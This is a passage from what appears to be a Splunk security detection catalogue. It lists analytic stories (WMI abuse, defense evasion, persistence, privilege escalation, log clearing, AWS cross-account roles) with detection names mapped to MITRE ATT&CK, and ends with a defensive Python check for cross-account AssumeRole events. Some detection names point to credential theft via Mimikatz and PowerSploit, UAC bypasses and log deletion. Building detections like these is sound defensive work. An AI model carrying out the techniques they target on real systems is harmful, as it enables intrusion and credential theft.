Suspicious Rundll32 Rename | T1218.011, T1036.003 | Rundll32, Rename System Utilities | Defense Evasion, Defense Evasion | Hunting
Suspicious Rundll32 StartW | T1218.011 | Rundll32 | Defense Evasion | TTP
Suspicious Rundll32 dllregisterserver | T1218.011 | Rundll32 | Defense Evasion | TTP
Suspicious Rundll32 no Command Line Arguments | T1218.011 | Rundll32 | Defense Evasion | TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 1


Suspicious wmi use

Attackers are increasingly abusing Windows Management Instrumentation (WMI), a framework and associated utilities available on all modern Windows operating systems. Because WMI can be leveraged to manage both local and remote systems, it is important to identify the processes executed and the user context within which the activity occurred.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2018-10-23
  • Use Case: Advanced Threat Detection

Detection Profile

Name | ID | Technique | Tactic | Type
Detect WMI Event Subscription Persistence | T1546.003, T1047 | Windows Management Instrumentation Event Subscription, Windows Management Instrumentation | Privilege Escalation, Persistence, Execution | TTP
Process Execution via WMI | T1047 | Windows Management Instrumentation | Execution | TTP
Remote Process Instantiation via WMI | T1047 | Windows Management Instrumentation | Execution | TTP
Remote WMI Command Attempt | T1047 | Windows Management Instrumentation | Execution | TTP
Script Execution via WMI | T1047 | Windows Management Instrumentation | Execution | TTP
WMI Permanent Event Subscription | T1047 | Windows Management Instrumentation | Execution | TTP
WMI Permanent Event Subscription - Sysmon | T1546.003 | Windows Management Instrumentation Event Subscription | Privilege Escalation, Persistence | TTP
WMI Temporary Event Subscription | T1047 | Windows Management Instrumentation | Execution | TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 2


Suspicious windows registry activities

Monitor and detect registry changes initiated from remote locations, which can be a sign that an attacker has infiltrated your system.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2018-05-31
  • Use Case: Advanced Threat Detection

Detection Profile

Name | ID | Technique | Tactic | Type
Disabling Remote User Account Control | T1548.002, T1036, T1547.010, T1070, T1547.001, T1546.012, T1546.011, T1113, T1543 | Bypass User Account Control, Masquerading, Port Monitors, Indicator Removal on Host, Registry Run Keys / Startup Folder, Image File Execution Options Injection, Application Shimming, Screen Capture, Create or Modify System Process | Privilege Escalation, Defense Evasion, Defense Evasion, Persistence, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Privilege Escalation, Persistence, Privilege Escalation, Persistence, Collection, Persistence, Privilege Escalation | TTP
Monitor Registry Keys for Print Monitors | T1547.010 | Port Monitors | Persistence, Privilege Escalation | TTP
Registry Keys Used For Persistence | T1547.001 | Registry Run Keys / Startup Folder | Persistence, Privilege Escalation | TTP
Registry Keys Used For Privilege Escalation | T1546.012 | Image File Execution Options Injection | Privilege Escalation, Persistence | TTP
Registry Keys for Creating SHIM Databases | T1546.011 | Application Shimming | Privilege Escalation, Persistence | TTP

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Suspicious zoom child processes

Attackers are using Zoom as a vector to increase privileges on a system. This story detects new child processes of Zoom and provides investigative actions for this detection.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2020-04-13
  • Use Case: Advanced Threat Detection

Detection Profile

Name | ID | Technique | Tactic | Type
Detect Prohibited Applications Spawning cmd exe | T1059.003, T1059, T1068, T1036.003 | Windows Command Shell, Command and Scripting Interpreter, Exploitation for Privilege Escalation, Rename System Utilities | Execution, Execution, Privilege Escalation, Defense Evasion | Hunting
Detect Prohibited Applications Spawning cmd exe | T1059 | Command and Scripting Interpreter | Execution | TTP
First Time Seen Child Process of Zoom | T1068 | Exploitation for Privilege Escalation | Privilege Escalation | Anomaly

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 1


Trusted developer utilities proxy execution

Monitor and detect behaviors used by attackers who leverage trusted developer utilities to execute malicious code.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-01-12
  • Use Case: Advanced Threat Detection

Detection Profile

Name | ID | Technique | Tactic | Type
Suspicious microsoft workflow compiler rename | T1127, T1036.003 | Trusted Developer Utilities Proxy Execution, Rename System Utilities | Defense Evasion, Defense Evasion | Hunting
Suspicious microsoft workflow compiler usage | T1127 | Trusted Developer Utilities Proxy Execution | Defense Evasion | TTP

Kill Chain Phase

  • Exploitation


Reference


version: 1


Trusted developer utilities proxy execution msbuild

Monitor and detect techniques used by attackers who leverage the msbuild.exe process to execute malicious code.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2021-01-21
  • Use Case: Advanced Threat Detection

Windows dns sigred cve-2020-1350

Uncover activity consistent with CVE-2020-1350, or SIGRed. Discovered by Checkpoint researchers, this vulnerability affects Windows 2003 to 2019, and is triggered by a malicious DNS response (only affects DNS over TCP). An attacker can use the malicious payload to cause a buffer overflow on the vulnerable system, leading to compromise. The included searches in this Analytic Story are designed to identify the large response payload for SIG and KEY DNS records which can be used for the exploit.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Network_Resolution
  • Last Updated: 2020-07-28
  • Use Case: Advanced Threat Detection

Windows defense evasion tactics

Detect tactics used by malware to evade defenses on Windows endpoints. A few of these include suspicious `reg.exe` processes, files hidden with `attrib.exe`, and disabling User Account Control, among many others.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2018-05-31
  • Use Case: Advanced Threat Detection

Detection Profile

Name | ID | Technique | Tactic | Type
Disable Registry Tool | T1562.001, T1564.001, T1548.002, T1112, T1222.001, T1036 | Disable or Modify Tools, Hidden Files and Directories, Bypass User Account Control, Modify Registry, Windows File and Directory Permissions Modification, Masquerading | Defense Evasion, Defense Evasion, Privilege Escalation, Defense Evasion, Defense Evasion, Defense Evasion, Defense Evasion | TTP
Disable Show Hidden Files | T1564.001, T1562.001 | Hidden Files and Directories, Disable or Modify Tools | Defense Evasion, Defense Evasion | TTP
Disable Windows Behavior Monitoring | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP
Disable Windows SmartScreen Protection | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP
Disabling CMD Application | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP
Disabling ControlPanel | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP
Disabling Firewall with Netsh | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP
Disabling FolderOptions Windows Feature | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP
Disabling NoRun Windows App | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP
Disabling Remote User Account Control | T1548.002, T1036, T1547.010, T1070, T1547.001, T1546.012, T1546.011, T1113, T1543 | Bypass User Account Control, Masquerading, Port Monitors, Indicator Removal on Host, Registry Run Keys / Startup Folder, Image File Execution Options Injection, Application Shimming, Screen Capture, Create or Modify System Process | Privilege Escalation, Defense Evasion, Defense Evasion, Persistence, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Privilege Escalation, Persistence, Privilege Escalation, Persistence, Collection, Persistence, Privilege Escalation | TTP
Disabling SystemRestore In Registry | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP
Disabling Task Manager | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP
Eventvwr UAC Bypass | T1548.002 | Bypass User Account Control | Privilege Escalation, Defense Evasion | TTP
Excessive number of service control start as disabled | T1562.001 | Disable or Modify Tools | Defense Evasion | Anomaly
FodHelper UAC Bypass | T1112, T1548.002 | Modify Registry, Bypass User Account Control | Defense Evasion, Privilege Escalation, Defense Evasion | TTP
Hiding Files And Directories With Attrib exe | T1222.001 | Windows File and Directory Permissions Modification | Defense Evasion | TTP
NET Profiler UAC bypass | T1548.002 | Bypass User Account Control | Privilege Escalation, Defense Evasion | TTP
SLUI RunAs Elevated | T1548.002 | Bypass User Account Control | Privilege Escalation, Defense Evasion | TTP
SLUI Spawning a Process | T1548.002 | Bypass User Account Control | Privilege Escalation, Defense Evasion | TTP
Sdclt UAC Bypass | T1548.002 | Bypass User Account Control | Privilege Escalation, Defense Evasion | TTP
SilentCleanup UAC Bypass | T1548.002 | Bypass User Account Control | Privilege Escalation, Defense Evasion | TTP
Suspicious Reg exe Process | T1112 | Modify Registry | Defense Evasion | TTP
System Process Running from Unexpected Location | T1036 | Masquerading | Defense Evasion | Anomaly
UAC Bypass MMC Load Unsigned Dll | T1548.002 | Bypass User Account Control | Privilege Escalation, Defense Evasion | TTP
WSReset UAC Bypass | T1548.002 | Bypass User Account Control | Privilege Escalation, Defense Evasion | TTP
Windows DisableAntiSpyware Registry | T1562.001 | Disable or Modify Tools | Defense Evasion | TTP

Kill Chain Phase

  • Actions on Objectives
  • Delivery
  • Exploitation
  • Privilege Escalation


Reference


version: 1


Windows discovery techniques

Monitor for behaviors associated with adversaries discovering objects in the environment that can be leveraged as the attack progresses.

  • Product: Splunk Behavioral Analytics, Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2021-03-04
  • Use Case: Advanced Threat Detection

Detection Profile

Name | ID | Technique | Tactic | Type
Reconnaissance and Access to Accounts Groups and Policies via PowerSploit modules | T1078, T1087, T1484, T1199, T1482, T1590, T1591, T1595, T1592, T1007, T1012, T1046, T1047, T1057, T1083, T1518, T1592.002, T1021.002, T1135, T1039, T1053, T1068, T1543, T1547, T1574, T1589.001, T1590.001, T1590.003, T1098, T1595.002, T1055 | Valid Accounts, Account Discovery, Domain Policy Modification, Trusted Relationship, Domain Trust Discovery, Gather Victim Network Information, Gather Victim Org Information, Active Scanning, Gather Victim Host Information, System Service Discovery, Query Registry, Network Service Scanning, Windows Management Instrumentation, Process Discovery, File and Directory Discovery, Software Discovery, Software, SMB/Windows Admin Shares, Network Share Discovery, Data from Network Shared Drive, Scheduled Task/Job, Exploitation for Privilege Escalation, Create or Modify System Process, Boot or Logon Autostart Execution, Hijack Execution Flow, Credentials, Domain Properties, Network Trust Dependencies, Account Manipulation, Vulnerability Scanning, Process Injection | Defense Evasion, Persistence, Privilege Escalation, Initial Access, Discovery, Defense Evasion, Privilege Escalation, Initial Access, Discovery, Reconnaissance, Reconnaissance, Reconnaissance, Reconnaissance, Discovery, Discovery, Discovery, Execution, Discovery, Discovery, Discovery, Reconnaissance, Lateral Movement, Discovery, Collection, Execution, Persistence, Privilege Escalation, Privilege Escalation, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Defense Evasion, Reconnaissance, Reconnaissance, Reconnaissance, Persistence, Reconnaissance, Defense Evasion, Privilege Escalation | TTP
Reconnaissance and Access to Accounts and Groups via Mimikatz modules | T1078, T1087, T1484 | Valid Accounts, Account Discovery, Domain Policy Modification | Defense Evasion, Persistence, Privilege Escalation, Initial Access, Discovery, Defense Evasion, Privilege Escalation | TTP
Reconnaissance and Access to Active Directory Infrastructure via PowerSploit modules | T1199, T1482, T1590, T1591, T1595 | Trusted Relationship, Domain Trust Discovery, Gather Victim Network Information, Gather Victim Org Information, Active Scanning | Initial Access, Discovery, Reconnaissance, Reconnaissance, Reconnaissance | TTP
Reconnaissance and Access to Computers and Domains via PowerSploit modules | T1592, T1590, T1087 | Gather Victim Host Information, Gather Victim Network Information, Account Discovery | Reconnaissance, Reconnaissance, Discovery | TTP
Reconnaissance and Access to Computers via Mimikatz modules | T1592 | Gather Victim Host Information | Reconnaissance | TTP
Reconnaissance and Access to Operating System Elements via PowerSploit modules | T1007, T1012, T1046, T1047, T1057, T1083, T1518, T1592.002 | System Service Discovery, Query Registry, Network Service Scanning, Windows Management Instrumentation, Process Discovery, File and Directory Discovery, Software Discovery, Software | Discovery, Discovery, Discovery, Execution, Discovery, Discovery, Discovery, Reconnaissance | TTP
Reconnaissance and Access to Processes and Services via Mimikatz modules | T1007, T1046, T1057 | System Service Discovery, Network Service Scanning, Process Discovery | Discovery, Discovery, Discovery | TTP
Reconnaissance and Access to Shared Resources via Mimikatz modules | T1021.002, T1135, T1039 | SMB/Windows Admin Shares, Network Share Discovery, Data from Network Shared Drive | Lateral Movement, Discovery, Collection | TTP
Reconnaissance and Access to Shared Resources via PowerSploit modules | T1021.002, T1135, T1039 | SMB/Windows Admin Shares, Network Share Discovery, Data from Network Shared Drive | Lateral Movement, Discovery, Collection | TTP
Reconnaissance of Access and Persistence Opportunities via PowerSploit modules | T1053, T1068, T1078, T1543, T1547, T1574 | Scheduled Task/Job, Exploitation for Privilege Escalation, Valid Accounts, Create or Modify System Process, Boot or Logon Autostart Execution, Hijack Execution Flow | Execution, Persistence, Privilege Escalation, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Defense Evasion | TTP
Reconnaissance of Connectivity via PowerSploit modules | T1021.002, T1135, T1039 | SMB/Windows Admin Shares, Network Share Discovery, Data from Network Shared Drive | Lateral Movement, Discovery, Collection | TTP
Reconnaissance of Credential Stores and Services via Mimikatz modules | T1589.001, T1590.001, T1590.003, T1068, T1078, T1098 | Credentials, Domain Properties, Network Trust Dependencies, Exploitation for Privilege Escalation, Valid Accounts, Account Manipulation | Reconnaissance, Reconnaissance, Reconnaissance, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence | TTP
Reconnaissance of Defensive Tools via PowerSploit modules | T1595.002, T1592.002 | Vulnerability Scanning, Software | Reconnaissance, Reconnaissance | TTP
Reconnaissance of Privilege Escalation Opportunities via PowerSploit modules | T1068, T1078, T1098 | Exploitation for Privilege Escalation, Valid Accounts, Account Manipulation | Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence | TTP
Reconnaissance of Process or Service Hijacking Opportunities via Mimikatz modules | T1543, T1055, T1574 | Create or Modify System Process, Process Injection, Hijack Execution Flow | Persistence, Privilege Escalation, Defense Evasion, Privilege Escalation, Persistence, Privilege Escalation, Defense Evasion | TTP

Kill Chain Phase

  • Actions on Objectives


Reference


version: 1


Windows log manipulation

Adversaries often try to cover their tracks by manipulating Windows logs. Use these searches to help you monitor for suspicious activity surrounding log files--an essential component of an effective defense.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2017-09-12
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
Deleting Shadow Copies | T1490, T1070, T1070.001 | Inhibit System Recovery, Indicator Removal on Host, Clear Windows Event Logs | Impact, Defense Evasion, Defense Evasion | TTP
Illegal Deletion of Logs via Mimikatz modules | T1070 | Indicator Removal on Host | Defense Evasion | TTP
Suspicious Event Log Service Behavior | T1070.001 | Clear Windows Event Logs | Defense Evasion | TTP
Suspicious wevtutil Usage | T1070.001 | Clear Windows Event Logs | Defense Evasion | TTP
USN Journal Deletion | T1070 | Indicator Removal on Host | Defense Evasion | TTP
WevtUtil Usage To Clear Logs | T1070.001 | Clear Windows Event Logs | Defense Evasion | TTP
Wevtutil Usage To Disable Logs | T1070.001 | Clear Windows Event Logs | Defense Evasion | TTP
Windows Event Log Cleared | T1070.001 | Clear Windows Event Logs | Defense Evasion | TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 2


Windows persistence techniques

Monitor for activities and techniques associated with maintaining persistence on a Windows system--a sign that an adversary may have compromised your environment.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2018-05-31
  • Use Case: Advanced Threat Detection

Detection Profile

Name | ID | Technique | Tactic | Type
Certutil exe certificate extraction | | | | TTP
Detect Path Interception By Creation Of program exe | T1574.009, T1222.001, T1585, T1078, T1098, T1207, T1484, T1053, T1134, T1548, T1547.010, T1574.011, T1547.001, T1546.011, T1543.003, T1053.005, T1068 | Path Interception by Unquoted Path, Windows File and Directory Permissions Modification, Establish Accounts, Valid Accounts, Account Manipulation, Rogue Domain Controller, Domain Policy Modification, Scheduled Task/Job, Access Token Manipulation, Abuse Elevation Control Mechanism, Port Monitors, Services Registry Permissions Weakness, Registry Run Keys / Startup Folder, Application Shimming, Windows Service, Scheduled Task, Exploitation for Privilege Escalation | Persistence, Privilege Escalation, Defense Evasion, Defense Evasion, Resource Development, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence, Defense Evasion, Defense Evasion, Privilege Escalation, Execution, Persistence, Privilege Escalation, Defense Evasion, Privilege Escalation, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Persistence, Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Privilege Escalation, Persistence, Persistence, Privilege Escalation, Execution, Persistence, Privilege Escalation, Privilege Escalation | TTP
Hiding Files And Directories With Attrib exe | T1222.001 | Windows File and Directory Permissions Modification | Defense Evasion | TTP
Illegal Account Creation via PowerSploit modules | T1585 | Establish Accounts | Resource Development | TTP
Illegal Enabling or Disabling of Accounts via DSInternals modules | T1078, T1098 | Valid Accounts, Account Manipulation | Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence | TTP
Illegal Management of Active Directory Elements and Policies via DSInternals modules | T1098, T1207, T1484 | Account Manipulation, Rogue Domain Controller, Domain Policy Modification | Persistence, Defense Evasion, Defense Evasion, Privilege Escalation | TTP
Illegal Management of Computers and Active Directory Elements via PowerSploit modules | T1098, T1207, T1484 | Account Manipulation, Rogue Domain Controller, Domain Policy Modification | Persistence, Defense Evasion, Defense Evasion, Privilege Escalation | TTP
Illegal Privilege Elevation and Persistence via PowerSploit modules | T1053, T1134, T1548 | Scheduled Task/Job, Access Token Manipulation, Abuse Elevation Control Mechanism | Execution, Persistence, Privilege Escalation, Defense Evasion, Privilege Escalation, Privilege Escalation, Defense Evasion | TTP
Monitor Registry Keys for Print Monitors | T1547.010 | Port Monitors | Persistence, Privilege Escalation | TTP
Reg exe Manipulating Windows Services Registry Keys | T1574.011 | Services Registry Permissions Weakness | Persistence, Privilege Escalation, Defense Evasion | TTP
Registry Keys Used For Persistence | T1547.001 | Registry Run Keys / Startup Folder | Persistence, Privilege Escalation | TTP
Registry Keys for Creating SHIM Databases | T1546.011 | Application Shimming | Privilege Escalation, Persistence | TTP
Sc exe Manipulating Windows Services | T1543.003 | Windows Service | Persistence, Privilege Escalation | TTP
Schedule Task with HTTP Command Arguments | T1053 | Scheduled Task/Job | Execution, Persistence, Privilege Escalation | TTP
Schedule Task with Rundll32 Command Trigger | T1053 | Scheduled Task/Job | Execution, Persistence, Privilege Escalation | TTP
Schtasks used for forcing a reboot | T1053.005 | Scheduled Task | Execution, Persistence, Privilege Escalation | TTP
Setting Credentials via DSInternals modules | T1068, T1078, T1098 | Exploitation for Privilege Escalation, Valid Accounts, Account Manipulation | Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence | TTP
Setting Credentials via Mimikatz modules | T1068, T1078, T1098 | Exploitation for Privilege Escalation, Valid Accounts, Account Manipulation | Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence | TTP
Setting Credentials via PowerSploit modules | T1068, T1078, T1098 | Exploitation for Privilege Escalation, Valid Accounts, Account Manipulation | Privilege Escalation, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence | TTP
Shim Database File Creation | T1546.011 | Application Shimming | Privilege Escalation, Persistence | TTP
Shim Database Installation With Suspicious Parameters | T1546.011 | Application Shimming | Privilege Escalation, Persistence | TTP
Suspicious Scheduled Task from Public Directory | T1053.005 | Scheduled Task | Execution, Persistence, Privilege Escalation | Anomaly
WinEvent Scheduled Task Created Within Public Path | T1053.005 | Scheduled Task | Execution, Persistence, Privilege Escalation | TTP
WinEvent Scheduled Task Created to Spawn Shell | T1053.005 | Scheduled Task | Execution, Persistence, Privilege Escalation | TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation
  • Installation
  • Privilege Escalation


Reference


version: 2


Windows privilege escalation

Monitor for and investigate activities that may be associated with a Windows privilege-escalation attack, including unusual processes running on endpoints, modified registry keys, and more.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Endpoint
  • Last Updated: 2020-02-04
  • Use Case: Advanced Threat Detection

Detection Profile

Name | ID | Technique | Tactic | Type
Child Processes of Spoolsv exe | T1068, T1134, T1548, T1546.008, T1078, T1098, T1546.012 | Exploitation for Privilege Escalation, Access Token Manipulation, Abuse Elevation Control Mechanism, Accessibility Features, Valid Accounts, Account Manipulation, Image File Execution Options Injection | Privilege Escalation, Defense Evasion, Privilege Escalation, Privilege Escalation, Defense Evasion, Privilege Escalation, Persistence, Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence, Privilege Escalation, Persistence | TTP
Illegal Privilege Elevation via Mimikatz modules | T1134, T1548 | Access Token Manipulation, Abuse Elevation Control Mechanism | Defense Evasion, Privilege Escalation, Privilege Escalation, Defense Evasion | TTP
Overwriting Accessibility Binaries | T1546.008 | Accessibility Features | Privilege Escalation, Persistence | TTP
Probing Access with Stolen Credentials via PowerSploit modules | T1078, T1098 | Valid Accounts, Account Manipulation | Defense Evasion, Persistence, Privilege Escalation, Initial Access, Persistence | TTP
Registry Keys Used For Privilege Escalation | T1546.012 | Image File Execution Options Injection | Privilege Escalation, Persistence | TTP

Kill Chain Phase

  • Actions on Objectives
  • Exploitation


Reference


version: 2



Best Practices

Asset tracking

Keep a careful inventory of every asset on your network to make it easier to detect rogue devices. Unauthorized/unmanaged devices could be an indication of malicious behavior that should be investigated further.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Network_Sessions
  • Last Updated: 2017-09-13
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
Detect Unauthorized Assets by MAC address | | | | TTP

Kill Chain Phase

  • Actions on Objectives
  • Delivery
  • Reconnaissance


Reference


version: 1


Monitor for updates

Monitor your enterprise to ensure that your endpoints are being patched and updated. Adversaries notoriously exploit known vulnerabilities that could be mitigated by applying routine security patches.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Updates
  • Last Updated: 2017-09-15
  • Use Case: Compliance

Detection Profile

Name | ID | Technique | Tactic | Type
No Windows Updates in a time frame | | | | Hunting

Kill Chain Phase

Reference


version: 1


Prohibited traffic allowed or protocol mismatch

Detect instances of prohibited network traffic allowed in the environment, as well as protocols running on non-standard ports. Both of these types of behaviors typically violate policy and can be leveraged by attackers.

Detection Profile

Name | ID | Technique | Tactic | Type
Allow Inbound Traffic By Firewall Rule Registry | T1021.001, T1189, T1021, T1048, T1048.003, T1071.001 | Remote Desktop Protocol, Drive-by Compromise, Remote Services, Exfiltration Over Alternative Protocol, Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol, Web Protocols | Lateral Movement, Initial Access, Lateral Movement, Exfiltration, Exfiltration, Command And Control | TTP
Allow Inbound Traffic In Firewall Rule | T1021.001 | Remote Desktop Protocol | Lateral Movement | TTP
Detect hosts connecting to dynamic domain providers | T1189 | Drive-by Compromise | Initial Access | TTP
Enable RDP In Other Port Number | T1021 | Remote Services | Lateral Movement | TTP
Prohibited Network Traffic Allowed | T1048 | Exfiltration Over Alternative Protocol | Exfiltration | TTP
Protocol or Port Mismatch | T1048.003 | Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol | Exfiltration | Anomaly
TOR Traffic | T1071.001 | Web Protocols | Command And Control | TTP

Kill Chain Phase

  • Actions on Objectives
  • Command and Control
  • Delivery
  • Exploitation


Reference


version: 1


Router and infrastructure security

Validate the security configuration of network infrastructure and verify that only authorized users and systems are accessing critical assets. Core routing and switching infrastructure are common strategic targets for attackers.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Authentication, Network_Traffic
  • Last Updated: 2017-09-12
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
Detect ARP Poisoning | T1200, T1498, T1557.002, T1557, T1542.005, T1020.001 | Hardware Additions, Network Denial of Service, ARP Cache Poisoning, Man-in-the-Middle, TFTP Boot, Traffic Duplication | Initial Access, Impact, Credential Access, Collection, Credential Access, Collection, Defense Evasion, Persistence, Exfiltration | TTP
Detect IPv6 Network Infrastructure Threats | T1200, T1498, T1557.002 | Hardware Additions, Network Denial of Service, ARP Cache Poisoning | Initial Access, Impact, Credential Access, Collection | TTP
Detect New Login Attempts to Routers | | | | TTP
Detect Port Security Violation | T1200, T1498, T1557.002 | Hardware Additions, Network Denial of Service, ARP Cache Poisoning | Initial Access, Impact, Credential Access, Collection | TTP
Detect Rogue DHCP Server | T1200, T1498, T1557 | Hardware Additions, Network Denial of Service, Man-in-the-Middle | Initial Access, Impact, Credential Access, Collection | TTP
Detect Software Download To Network Device | T1542.005 | TFTP Boot | Defense Evasion, Persistence | TTP
Detect Traffic Mirroring | T1200, T1498, T1020.001 | Hardware Additions, Network Denial of Service, Traffic Duplication | Initial Access, Impact, Exfiltration | TTP

Kill Chain Phase

  • Actions on Objectives
  • Delivery
  • Exploitation
  • Reconnaissance


Reference


version: 1


Use of cleartext protocols

Leverage searches that detect cleartext network protocols that may leak credentials or should otherwise be encrypted.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:Network_Traffic
  • Last Updated: 2017-09-15
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
Protocols passing authentication in cleartext | - | - | - | TTP

Kill Chain Phase

  • Actions on Objectives
  • Reconnaissance


Reference


version: 1



Cloud Security

Aws cross account activity

Track when a user assumes an IAM role in another AWS account to obtain cross-account access to services and resources in that account. Accessing new roles could be an indication of malicious activity.

  • Product: Splunk Enterprise, Splunk Enterprise Security, Splunk Cloud
  • Datamodel:
  • Last Updated: 2018-06-04
  • Use Case: Security Monitoring

Detection Profile

Name | ID | Technique | Tactic | Type
aws detect attach to role policy | T1078, T1550 | Valid Accounts, Use Alternate Authentication Material | Defense Evasion, Persistence, Privilege Escalation, Initial Access, Lateral Movement | Hunting
aws detect permanent key creation | T1078 | Valid Accounts | Defense Evasion, Persistence, Privilege Escalation, Initial Access | Hunting
aws detect role creation | T1078 | Valid Accounts | Defense Evasion, Persistence, Privilege Escalation, Initial Access | Hunting
aws detect sts assume role abuse | T1078 | Valid Accounts | Defense Evasion, Persistence, Privilege Escalation, Initial Access | Hunting
aws detect sts get session token abuse | T1550 | Use Alternate Authentication Material | Defense Evasion, Lateral Movement | Hunting
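The cross-account signal in this story comes from CloudTrail `sts:AssumeRole` records: the caller's account (in `userIdentity.accountId`) differs from the account embedded in `requestParameters.roleArn`, and the pair has not been reviewed before. Below is an added Python illustration of that check, not Splunk content or an SPL search from this story; the account numbers, role names, IP addresses and the `KNOWN_PAIRS` baseline are constructed for the example.

```python
"""Added example (not Splunk content): flag cross-account sts:AssumeRole calls in
CloudTrail and mark (caller account, role ARN) pairs that have never been seen before.

Assumptions (not from the page): account numbers, role names, IPs and the
KNOWN_PAIRS baseline are constructed for the example."""
import json

# Constructed baseline of already-reviewed cross-account pairs: (caller account, role ARN).
KNOWN_PAIRS = {("111111111111", "arn:aws:iam::222222222222:role/DeployRole")}


def _record(caller_account, caller_type, role_arn, recipient, ip, error=None):
    """Build a minimal CloudTrail AssumeRole record (constructed, not real log data)."""
    rec = {
        "eventSource": "sts.amazonaws.com",
        "eventName": "AssumeRole",
        "userIdentity": {"type": caller_type, "accountId": caller_account,
                         "arn": f"arn:aws:iam::{caller_account}:user/ci"},
        "requestParameters": {"roleArn": role_arn, "roleSessionName": "ci"},
        "recipientAccountId": recipient,
        "sourceIPAddress": ip,
    }
    if error:
        rec["errorCode"] = error
    return json.dumps(rec)


SAMPLE_EVENTS = [
    # Same-account role switch: not cross-account.
    _record("222222222222", "IAMUser", "arn:aws:iam::222222222222:role/DeployRole",
            "222222222222", "203.0.113.10"),
    # Known cross-account pair from the baseline.
    _record("111111111111", "IAMUser", "arn:aws:iam::222222222222:role/DeployRole",
            "222222222222", "203.0.113.10"),
    # Never-seen caller account assuming an admin role: the interesting one.
    _record("999999999999", "IAMUser", "arn:aws:iam::222222222222:role/OrgAdmin",
            "222222222222", "198.51.100.77"),
    # Failed attempt (AccessDenied): excluded here, a brute-force story would count these.
    _record("999999999999", "IAMUser", "arn:aws:iam::222222222222:role/OrgAdmin",
            "222222222222", "198.51.100.77", error="AccessDenied"),
]


def account_from_arn(arn):
    """arn:partition:service:region:account-id:resource -> account-id (or None)."""
    parts = arn.split(":")
    return parts[4] if len(parts) >= 6 and parts[4] else None


def find_cross_account_assume_role(lines, known_pairs=KNOWN_PAIRS):
    """Return one finding per successful AssumeRole whose target account differs from the caller's."""
    findings = []
    for line in lines:
        ev = json.loads(line)
        if ev.get("eventSource") != "sts.amazonaws.com" or ev.get("eventName") != "AssumeRole":
            continue
        if ev.get("errorCode"):
            continue
        identity = ev.get("userIdentity") or {}
        if identity.get("type") == "AWSService":
            continue  # service-initiated assumptions carry no caller account; handle separately
        role_arn = (ev.get("requestParameters") or {}).get("roleArn", "")
        caller, target = identity.get("accountId"), account_from_arn(role_arn)
        if not caller or not target or caller == target:
            continue
        findings.append({
            "caller_account": caller,
            "role_arn": role_arn,
            "target_account": target,
            "source_ip": ev.get("sourceIPAddress"),
            "new_pair": (caller, role_arn) not in known_pairs,
        })
    return findings


if __name__ == "__main__":
    for finding in find_cross_account_assume_role(SAMPLE_EVENTS):
        print(finding)
```

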